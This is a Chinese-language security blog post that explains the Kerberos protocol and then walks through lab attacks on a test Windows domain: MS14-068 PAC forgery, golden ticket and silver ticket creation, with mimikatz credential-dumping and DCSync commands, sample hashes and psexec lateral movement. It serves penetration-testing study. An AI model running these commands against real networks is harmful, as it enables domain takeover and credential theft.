<!DOCTYPE HTML>
<html>
<head>
  <meta charset="utf-8">
  <meta http-equiv="pragma" content="no-cache">
  <meta http-equiv="cache-control" content="no-cache">
  <meta http-equiv="expires" content="0">
  
  <title>kerberos网络身份认证-PTT-ms14068 | Tptfb11&#39;S Blog</title>
  <meta name="author" content="Tptfb11">
  
  <meta name="description" content="kerberos网络身份认证-PTT-ms14068.">
  
  
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">

  <meta property="og:title" content="kerberos网络身份认证-PTT-ms14068"/>
  <meta property="og:site_name" content="Tptfb11&#39;S Blog"/>

  
    <meta property="og:image" content=""/>
  

  
    <link rel="alternative" href="/atom.xml" title="Tptfb11&#39;S Blog" type="application/atom+xml">
  
  
    <link href="/favicon.png" rel="icon">
  
  
  <link rel="stylesheet" href="/css/bootstrap.min.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/font-awesome.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/style.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/responsive.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/highlight.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/google-fonts.css" media="screen" type="text/css">
  <!--[if lt IE 9]><script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script><![endif]-->

  <script src="/js/jquery-2.0.3.min.js"></script>

  <!-- analytics -->
  




<meta name="generator" content="Hexo 6.3.0"></head>

 <body>  
  <nav id="main-nav" class="navbar navbar-inverse navbar-fixed-top" role="navigation">
    <div class="container">
      <button type="button" class="navbar-header navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse">
		<span class="sr-only">Toggle navigation</span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
      </button>
	  <a class="navbar-brand" href="/">Tptfb11&#39;S Blog</a>
      <div class="collapse navbar-collapse nav-menu">
		<ul class="nav navbar-nav">
		  
		  <li>
			<a href="/archives" title="归档文章.">
			  <i class="fa fa-archive"></i>Archives
			</a>
		  </li>
		  
		  <li>
			<a href="/categories" title="文章分类.">
			  <i class="fa fa-folder"></i>Categories
			</a>
		  </li>
		  
		  <li>
			<a href="/tags" title="文章标签.">
			  <i class="fa fa-tags"></i>Tags
			</a>
		  </li>
		  
		  <li>
			<a href="/tools" title="常用工具.">
			  <i class="fa fa-fighter-jet"></i>Tools
			</a>
		  </li>
		  
		  <li>
			<a href="/notes" title="生活随笔.">
			  <i class="fa fa-paper-plane"></i>Notes
			</a>
		  </li>
		  
		  <li>
			<a href="/about" title="关于我.">
			  <i class="fa fa-user"></i>About
			</a>
		  </li>
		  
		</ul>
      </div>
    </div> <!-- container -->
</nav>
<div class="clearfix"></div>

  <div class="container">
  	<div class="content">
    	 


	
		<div class="page-header">
			<h1> kerberos网络身份认证-PTT-ms14068</h1>
		</div>
	



<div class="row post">
	<!-- cols -->
	
	<div id="top_meta"></div>
	<div class="col-md-9">
	

	<!-- content -->
	<div class="mypage">		
	  
		 <div class="alert alert-success description">
			<i class="fa fa-info-circle"></i> kerberos网络身份认证-PTT-ms14068.
		 </div> <!-- alert -->
	  		

	  <p>kerberos网络身份认证-PTT-ms14068.</p>
<h2 id="写在前边"><a href="#写在前边" class="headerlink" title="写在前边"></a>写在前边</h2><p>Windows 横向渗透的两种方式。</p>
<p>1、<strong>hash传递攻击</strong>，通过传递NTLM-Hash，登录机器，简称PTH； </p>
<p>2、<strong>ticket传递攻击</strong>，通过传递kerberos的ticket，登录机器，简称PTT； </p>
<p>这一篇聊一下kerberos协议和PTT攻击。</p>
<h2 id="简介"><a href="#简介" class="headerlink" title="简介"></a>简介</h2><p>Windwos平台下目前主要的网络身份认证协议有：NTLM身份认证、kerberos身份认证。 在互不信任的网络中，Kerberos是一种可靠的中心化认证协议，可以用于防窃听、防止重放攻击、保护数据完整性等场合，是一种应用对称密钥体制进行密钥管理的系统。</p>
<p>kerberos协议中也存在三个角色，分别是：</p>
<ul>
<li>客户端（client）：发送请求的一方。</li>
<li>服务端（Server）：接收请求的一方。</li>
<li>密钥分发中心（Key Distribution Center，KDC）：负责票据生成和分发的可信任第三方。</li>
</ul>
<p>而密钥分发中心KDC一般又分为两部分，分别是：</p>
<ul>
<li>AS（Authentication Server）：认证服务器，专门用来认证客户端的身份并发放客户用于访问TGS的TGT（票据授予票据）。</li>
<li>TGS（Ticket Granting Ticket）：票据授予服务器，用来发放整个认证过程以及客户端访问服务端时所需的服务授予票据（Ticket）。</li>
</ul>
<h2 id="基本原理"><a href="#基本原理" class="headerlink" title="基本原理"></a>基本原理</h2><p>简化的Kerberos认证流程可以分为两步。</p>
<ul>
<li>第一步，客户端向KDC请求获得他想要访问的服务的服务授予票据（可以想象成去动物园，想去买一张能够进入动物园的门票）。</li>
<li>第二步，拿着这张服务授予票据（Ticket）去访问服务端的服务。</li>
</ul>
<p><strong>此时就会出现两个问题</strong>。</p>
<ul>
<li><strong>问题1</strong>. KDC怎么知道你（客户端）就是真正的客户端？凭什么给你发放服务授予票据（Ticket）呢？</li>
<li><strong>问题2</strong>. 服务端怎么知道你带来的服务授予票据（Ticket）就是一张真正的票据呢？</li>
</ul>
<p><strong>交互流程</strong><img src="https://raw.githubusercontent.com/tpt11fb/blogPic/main/202211172304847.png" alt="img"></p>
<p>对于刚才提到的问题kerberos给出了答案。</p>
<p>Kerberos协议的完整流程上图所示共分为三步6小步：</p>
<p><strong>Client与 AS的交互：1.AS_REQ 2. AS_REP。为了验证客户端的身份合法性</strong>。</p>
<p>1、AS_REQ是Client发给AS的请求，这一步的目的是AS确认客户不是伪造的客户。</p>
<p>内容：AS_REQ&#x3D;[pc,ps,IP_list，Authenticator] ,发送client的一些信息，和加密的时间戳。Authenticator&#x3D;enc(TimeStamp)。</p>
<p>AS收到AS_REQ后如何确认客户端没有伪造呢？</p>
<p>(1)、AS可以解密Authenticator。</p>
<p>(2)、TimeNow-TimeStamp&lt;5MIN。</p>
<p>2、AS_REP是AS给client的响应。</p>
<p> AS对用户的hash进行解密，如果解密正确，AS就会返回用KDC内部用户krbtgt的NTLM-hash加密的TGT票据。TGT中包含PAC（特权属证书），PAC包含client的相关权限信息，如SID所在的组。简单理解PAC用户验证用户权限，只有KDC能够制作和查看PAC。</p>
<p>这一步的目的有两个:</p>
<p>(1).AS给合法用户颁发TGT。</p>
<p>(2).AS给合法用户提供与TGS通信的session_key。</p>
<p><strong>Client与TGS的交互：3.TGS_REQ 4. TGS_REP。为了获取目标服务的票据</strong>。</p>
<p>3、TGS_REQ是client给TGS的请求，这一步的目的只有一个:Client 向TGS请求服务票据Ticket。</p>
<p>client凭借TGT向TGS发起针对需要访问服务的请求。TGS在收到客户端发的TGS_REQ后如何确认TGT不是伪造呢？</p>
<p>(1).TGS可以解密dec(TGT)key&#x3D; hash_krbtgt, 从而得到SK,解密正确，说明票据是真实的。</p>
<p>(2).TGT&#x3D;enc(pc,ps,ip_list,TimeStamp,timelife,SK) key&#x3D;hash_krbtgt利用SK解密Authenticator，得到pc2，比较pc1与pc2。</p>
<p>(3).TimeNow – TimeStamp（TGT）&lt; timelife 8 小时。</p>
<p>4、TGS_REP是TGS给client的应答，这一步的目的只有有一个:TGS 向client发送服务票据Ticket。</p>
<p>TGS使用krbtgt的NTLM hash对TGT进行解密，如果正确，就返回服务NTLM hash加密的TGS票据（简称ST）,并带上PAC。注意：在kerberos认证过程中，无论用户有没有访问服务的权限，只要TGT正确就会返回ST。</p>
<p>client在收到TGS发的TGS_REP后如何确认TGS数据包不是伪造呢？</p>
<p>(1).client可以解密dec(ps,SSK,TimeStamp, timelife)key&#x3D; SK, </p>
<p>(2).TimeNow – TimeStamp&lt; timelifet</p>
<p>Client 通过TGS_REP 获得了 Ticket 和 与 AP server 通信的会话密钥SSK</p>
<p><strong>Client与AP的交互：5.AP_REQ 6.AP_REP 为了验证票据的正确性。</strong></p>
<p>5、AP_REQ是client给服务的请求，这一步的目的是让服务验证client的合法性。</p>
<p>之后的两步就是client向服务请求。服务在收到client发的AP_REQ后如何验证client的合法性呢？</p>
<p>(1).A服务可以解密Ticket, Ticket &#x3D;enc(pc1,SSK,TimeStamp, timelife) key&#x3D;srver_hash。</p>
<p>(2).利用SSK解密Authenticator,比较pc1和pc2。</p>
<p>(3).验证时间戳。</p>
<p>6、AP_REP是服务给client的请求，这一步的目的是告知client验证 成功与否。</p>
<p>服务使用自己的NYLM hash去解密ST，如果解密正确，就会将其中的PAC给KDC解密，KDC由此判断client是否有访问服务的权限。注意：如果没有开启PAC就不会去向KDC求证。</p>
<p><strong>场景：</strong></p>
<p>小王是EBI在职员工，EBI有许多部门组织，例如：情报组（server）。小王要去情报组翻阅资料需要如下步骤（没有设置PAC）：</p>
<p>小王（client）提供自己的姓名和口令给认证系统（AS）。认证系统根据系统内小王用户的密码进行解密，发现信息正确，然后用门禁系统（KDC）的特殊密码（krbtgt的NTLM hash），将小王的信息加密后，打印出小王的凭证（TGT）。然后小王将凭证交给前台（TGS），并提供出自己要去情报组，前台扫描凭证（用krbtgt的NTLM hash解密）后。发现信息正确后将对应门禁卡（ST）交给小王，小王凭借门禁卡进入情报组找到自己想要的资料。</p>
<p>这过程之中也存在问题：</p>
<p>1、krbtgt的NTLM hash泄露。我们就可以任意伪造凭证去任何组织。（黄金票据）</p>
<p>2、在没有设置PAC的情况下，只要提供正确的门禁卡是可以任意进入的。（白银票据）</p>
<p>补充一下： 只有KDC能制作和查看PAC。如果设置了PAC就会多出一个步骤，即在小王使用对应门禁卡的时候情报组会去向门禁系统验证PAC是否正确。</p>
<h2 id="攻击方式"><a href="#攻击方式" class="headerlink" title="攻击方式"></a>攻击方式</h2><p><strong>环境</strong></p>
<p>域控 winserver2012 192.168.50.143</p>
<p>域成员 win7 192.168.50.138</p>
<h3 id="ms14-068伪造PAC"><a href="#ms14-068伪造PAC" class="headerlink" title="ms14-068伪造PAC"></a>ms14-068伪造PAC</h3><p>​      ms14-068漏洞主要通过伪造PAC，将普通用户权限提权为域管权限，以此来控制域控。只要服务器未打ms14-068补丁（KB3011780），在server 2000以上的域控服务器中，都可进行利用。</p>
<p><strong>利用条件</strong></p>
<p>1、获取域普通用户的账号密码。</p>
<p>2、获取域普通用户的sid。</p>
<p>3、服务器未打KB3011780补丁。</p>
<h4 id="手动"><a href="#手动" class="headerlink" title="手动"></a>手动</h4><p>1、查看当前系统补丁</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Systeminfo | findstr KB3011780</span><br></pre></td></tr></table></figure>

<p><img src="https://raw.githubusercontent.com/tpt11fb/blogPic/main/202211172304188.png" alt="img"></p>
<p>2、查看alex的sid（alex为域用户普通权限）</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">whoami</span> /user</span><br></pre></td></tr></table></figure>

<p><img src="https://raw.githubusercontent.com/tpt11fb/blogPic/main/202211172304236.png" alt="img"></p>
<p>3、清空本地缓存的票据</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">klist purge</span><br></pre></td></tr></table></figure>

<p><img src="https://raw.githubusercontent.com/tpt11fb/blogPic/main/202211172304589.png" alt="img"></p>
<p>4、清空mimikatz缓存的票据</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">kerberos::purge</span><br></pre></td></tr></table></figure>

<p><img src="https://raw.githubusercontent.com/tpt11fb/blogPic/main/202211172304866.png" alt="img"></p>
<p>5、利用MS14-068.EXE 生成票据</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">MS14-068.exe -u alex@god.org -p password -s sid -d owa.god.org</span><br></pre></td></tr></table></figure>

<p><img src="https://raw.githubusercontent.com/tpt11fb/blogPic/main/202211172304177.png" alt="img"></p>
<p>6、Mimikatz导入票据</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Ptc TGT_alex@god.org.ccache</span><br></pre></td></tr></table></figure>

<p><img src="https://raw.githubusercontent.com/tpt11fb/blogPic/main/202211172304873.png" alt="img"></p>
<p>7、Psexec 横向命令执行</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Psexec.exe \\owa cmd.exe</span><br></pre></td></tr></table></figure>

<p><img src="https://raw.githubusercontent.com/tpt11fb/blogPic/main/202211172304729.png" alt="img"></p>
<h3 id="黄金票据伪造TGT"><a href="#黄金票据伪造TGT" class="headerlink" title="黄金票据伪造TGT"></a>黄金票据伪造TGT</h3><p>​      在Kerberos认证中,Client通过AS(身份认证服务)认证后,AS会给Client一个 Session Key和TGT,而 TGT是由krbtgt的NTLM Hash加密的，所以只要得到krbtgt的NTLM Hash，就可以伪造TGT和Session Key来进入下一步Client与TGS的交互。而已有了金票后,就跳过AS验证,不用验证账户和密码,所以也不担心域管密码修改。</p>
<p>​      黄金票据常用于权限维持。 当我们获得域控的控制权限后，可以获取krbtgt的ntlm hash。当由于一些原因导致我们失去对域控的控制权后，并且krbtgt的密码没有更改，此时我们可以利用krbtgt用户的ntlm hash制作黄金票据伪造tgt，从而重新获取域控的管理权限。</p>
<p><strong>利用条件</strong></p>
<p>1、域名称。</p>
<p>2、域的SID值。</p>
<p>3、域的KRBTGT账号的HASH（获取域的SID和KRBTGT账号的NTLM HASH的前提是需要已经拿到了域的权限）。</p>
<p>4、伪造任意用户名。</p>
<h4 id="手动-1"><a href="#手动-1" class="headerlink" title="手动"></a>手动</h4><p>1、基本信息获取（SID,所处域）</p>
<p>SID</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wmic useraccount get name,sid</span><br></pre></td></tr></table></figure>

<p><img src="https://raw.githubusercontent.com/tpt11fb/blogPic/main/202211172304123.png" alt="img"></p>
<p>所在域</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">net config workstation</span><br></pre></td></tr></table></figure>

<p><img src="https://raw.githubusercontent.com/tpt11fb/blogPic/main/202211172304257.png" alt="img"></p>
<p>2、获取krbtgt用户hash</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">lsadump::dcsync /domain:god.org /all /csv</span><br></pre></td></tr></table></figure>

<p><img src="https://raw.githubusercontent.com/tpt11fb/blogPic/main/202211172304961.png" alt="img"></p>
<p>3、制作黄金票据</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">kerberos::golden	/user:administrator	/domain:god.org	/sid:S-1-5-21-2952760202-1353902439-2381784089	/krbtgt:58e91a5ac358d86513ab224312314061	/ticket:tic.kirbi</span><br></pre></td></tr></table></figure>

<p><img src="https://raw.githubusercontent.com/tpt11fb/blogPic/main/202211172304736.png" alt="img"></p>
<p>4、导入内存</p>
<p><img src="https://raw.githubusercontent.com/tpt11fb/blogPic/main/202211172304735.png" alt="img"></p>
<p>5、票据传递</p>
<p><img src="https://raw.githubusercontent.com/tpt11fb/blogPic/main/202211172304442.png" alt="img"></p>
<h3 id="白银票据伪造ST"><a href="#白银票据伪造ST" class="headerlink" title="白银票据伪造ST"></a>白银票据伪造ST</h3><p>​    如果说黄金票据是伪造的TGT,那么白银票据就是伪造的ST。 在Kerberos认证的第三步，Client带着ST向Server上的某个服务进行请求，Server接收到Client的请求之后,通过自己的server ntlm hash 解密ST, 进而验证对方的身份,验证成功就让 Client 访问server上的指定服务了。 所以我们只需要知道Server用户的Hash就可以伪造出一个ST,且不会经过KDC,但是伪造的门票只对部分服务起作用。		<strong>利用条件</strong></p>
<p>1.域名。</p>
<p>2.域sid。</p>
<p>3.目标服务器名。</p>
<p>4.可利用的服务。</p>
<p>5.服务账号的NTML HASH。</p>
<p>6.需要伪造的用户名。</p>
<h4 id="手动-2"><a href="#手动-2" class="headerlink" title="手动"></a>手动</h4><p>1、基本信息获取（SID，所处域，服务器名，NTLM HASH）</p>
<p>SID和所在域</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">whoami</span> /user &amp; net config workstation</span><br></pre></td></tr></table></figure>

<p><img src="https://raw.githubusercontent.com/tpt11fb/blogPic/main/202211172305688.png" alt="img"></p>
<p>服务名和NTLM HASH</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mimikatz.exe <span class="string">&quot;privilege::debug&quot;</span> <span class="string">&quot;sekurlsa::logonPasswords&quot;</span>  <span class="string">&quot;exit&quot;</span></span><br></pre></td></tr></table></figure>

<p>mimikatz.exe “privilege::debug” “sekurlsa::logonPasswords”  “exit”</p>
<p>2、制作白银票据</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">kerberos::golden /domain:god.org /sid:S-1-5-21-2952760202-1353902439-2381784089  /target:owa.god.org /service:cifs /rc4:5b52d5fc54aa6803f97816a4e7d19358 /user:owa /ptt</span><br></pre></td></tr></table></figure>

<p><img src="https://raw.githubusercontent.com/tpt11fb/blogPic/main/202211172305451.png" alt="img"></p>
<p>3、访问域控根目录</p>
<p><img src="https://raw.githubusercontent.com/tpt11fb/blogPic/main/202211172307475.png" alt="img"></p>
<h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>白银票据通常用于攻击域控，黄金票据则用于拿下域控后权限维持。</p>
<p>简单对比黄金票据和白银票据：</p>
<ul>
<li>黄金票据：是直接抓取域控中ktbtgt账号的hash，来在client端生成一个TGT票据，那么该票据是针对所有机器的所有服务。</li>
<li>白银票据：实际就是在抓取到了域控服务hash的情况下，在client端以一个普通域用户的身份生成TGS票据，并且是针对于某个机器上的某个服务的，生成的白银票据,只能访问指定的target机器中指定的服务。</li>
</ul>
<p>白银票据可伪造列表：</p>
<p><img src="https://raw.githubusercontent.com/tpt11fb/blogPic/main/202211172305030.png" alt="img"></p>

	  <div class="article-footer-copyright">

    本博客采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh" target="_blank">知识共享署名-非商业性使用-相同方式共享 4.0 国际许可协议(CC BY-NC-SA 4.0) 发布.</a>
</div>
	</div>

	
	<span id="/2022/11/17/kerberos%E7%BD%91%E7%BB%9C%E8%BA%AB%E4%BB%BD%E8%AE%A4%E8%AF%81-PTT-ms14068/" class="leancloud-visitors view" data-flag-title="kerberos网络身份认证-PTT-ms14068">
		<em class="post-meta-item-text"> Page View </em> <i class="leancloud-visitors-count"></i>
	</span>
	
	<div>
  	<center>

	<div class="pagination">

    
    
    <a href="/2023/03/20/java反射/" type="button" class="btn btn-default"><i
                class="fa fa-arrow-circle-o-left"></i> Prev</a>
    

    <a href="/" type="button" class="btn btn-default"><i class="fa fa-home"></i>Home</a>
    
    <a href="/2022/11/15/psexec-smbexec-wmiexec横向移动/" type="button" class="btn btn-default ">Next<i
                class="fa fa-arrow-circle-o-right"></i></a>
    

    
</div>


    </center>
	</div>
	
	<!-- comment -->
	<!--
<section id="comment">
    <h2 class="title">Comments</h2>

    
</section>

-->
	
		<section id="comments" class="comments">
			<style>
			.comments{margin:30px;padding:10px;background:rgb(0, 0, 0)}
			@media screen and (max-width:800px){.comments{margin:auto;padding:10px;background:#000}}
			</style>
			<div id="vcomment" class="comment"></div>
<script src='//unpkg.com/valine/dist/Valine.min.js'></script>
<script src="https://cdnjs.loli.net/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
<script>
var valineConfig = {"enable":true,"appId":"T4cIyHys5R6e08AOwUNWgymj-gzGzoHsz","appKey":"J1TTypyuxpKKmz37Rd7oQ9tE","placeholder":"提交评论时留下邮箱收到回复后将自动通知","visitor":true,"avatar":"monsterid","requiredFields":["nick","mail"]}
valineConfig.el='#vcomment';
new Valine(valineConfig);
    // new Valine({
    //     el: '#vcomment',
    //     appId: "",
    //     appKey: "",
    //     placeholder: "提交评论时留下邮箱收到回复后将自动通知",
    //     avatar:"monsterid",
    //     visitor: "true",
    //     requiredFields: "nick,mail".split(','),
    // });
</script>

		</section>
	
	</div> <!-- col-md-9/col-md-12 -->


	
	<div id="side_meta">
		<div class="col-md-3" id="post_meta"> 

	<!-- date -->
	
	<div class="meta-widget">
	<i class="fa fa-clock-o"></i>
	2022-11-17 
	</div>
	

	<!-- categories -->
    
	<div class="meta-widget">
	<a data-toggle="collapse" data-target="#categorys"><i class="fa fa-folder"></i></a>	
    <ul id="categorys" class="tag_box list-unstyled collapse in">
          
  <li>
    <li><a href="/categories/横向移动/">横向移动<span>3</span></a></li>
  </li>

    </ul>
	</div>
	

	<!-- tags -->
	
	<div class="meta-widget">
	<a data-toggle="collapse" data-target="#tags"><i class="fa fa-tags"></i></a>		  
    <ul id="tags" class="tag_box list-unstyled collapse in">	  
	    
  <li><a href="/tags/内网渗透/">内网渗透<span>3</span></a></li>
    </ul>
	</div>
		

	<!-- toc -->
	<div class="meta-widget">
	
	   <a data-toggle="collapse" data-target="#toc"><i class="fa fa-bars"></i></a>
	   <div id="toc" class="toc collapse in">
		   <span class="toc-title">Contents</span>
			<ol class="toc-article"><li class="toc-article-item toc-article-level-2"><a class="toc-article-link" href="#%E5%86%99%E5%9C%A8%E5%89%8D%E8%BE%B9"><span class="toc-article-text">写在前边</span></a></li><li class="toc-article-item toc-article-level-2"><a class="toc-article-link" href="#%E7%AE%80%E4%BB%8B"><span class="toc-article-text">简介</span></a></li><li class="toc-article-item toc-article-level-2"><a class="toc-article-link" href="#%E5%9F%BA%E6%9C%AC%E5%8E%9F%E7%90%86"><span class="toc-article-text">基本原理</span></a></li><li class="toc-article-item toc-article-level-2"><a class="toc-article-link" href="#%E6%94%BB%E5%87%BB%E6%96%B9%E5%BC%8F"><span class="toc-article-text">攻击方式</span></a><ol class="toc-article-child"><li class="toc-article-item toc-article-level-3"><a class="toc-article-link" href="#ms14-068%E4%BC%AA%E9%80%A0PAC"><span class="toc-article-text">ms14-068伪造PAC</span></a><ol class="toc-article-child"><li class="toc-article-item toc-article-level-4"><a class="toc-article-link" href="#%E6%89%8B%E5%8A%A8"><span class="toc-article-text">手动</span></a></li></ol></li><li class="toc-article-item toc-article-level-3"><a class="toc-article-link" href="#%E9%BB%84%E9%87%91%E7%A5%A8%E6%8D%AE%E4%BC%AA%E9%80%A0TGT"><span class="toc-article-text">黄金票据伪造TGT</span></a><ol class="toc-article-child"><li class="toc-article-item toc-article-level-4"><a class="toc-article-link" href="#%E6%89%8B%E5%8A%A8-1"><span class="toc-article-text">手动</span></a></li></ol></li><li class="toc-article-item toc-article-level-3"><a class="toc-article-link" href="#%E7%99%BD%E9%93%B6%E7%A5%A8%E6%8D%AE%E4%BC%AA%E9%80%A0ST"><span class="toc-article-text">白银票据伪造ST</span></a><ol class="toc-article-child"><li class="toc-article-item toc-article-level-4"><a class="toc-article-link" href="#%E6%89%8B%E5%8A%A8-2"><span class="toc-article-text">手动</span></a></li></ol></li></ol></li><li class="toc-article-item toc-article-level-2"><a class="toc-article-link" href="#%E6%80%BB%E7%BB%93"><span class="toc-article-text">总结</span></a></li></ol>
		</div>
	
	</div>
	
    <hr>
	
</div><!-- col-md-3 -->

		

	</div>
	
		

</div><!-- row -->

<!--
 -->



	</div>
  </div>
  <div class="container-narrow">
  <footer> <p>
  
  &copy; 2023 Tptfb11's Blog
  
      powered by <a href="http://hexo.io/" target="_blank">Hexo</a>.Theme <a href="https://github.com/Ares-X/hexo-theme-freemind.bithack" target="_blank">freemind.bithack</a>  
</p>
 </footer>
</div> <!-- container-narrow -->
  


  
<a id="gotop" href="#">   
  <span>⬆︎TOP</span>
</a>

<script src="/js/jquery.imagesloaded.min.js"></script>
<script src="/js/gallery.js"></script>
<script src="/js/bootstrap.min.js"></script>
<script src="/js/main.js"></script>
<script src="/js/search.js"></script> 


<link rel="stylesheet" href="/fancybox/jquery.fancybox.css" media="screen" type="text/css">
<script src="/fancybox/jquery.fancybox.pack.js"></script>
<script type="text/javascript">
(function($){
  $('.fancybox').fancybox();
})(jQuery);
</script>



   <script type="text/javascript">      
     var search_path = "search.xml";
	 if (search_path.length == 0) {
	 	search_path = "search.xml";
	 }
	 var path = "/" + search_path;
     searchFunc(path, 'local-search-input', 'local-search-result');
   </script>

</body>
   </html>
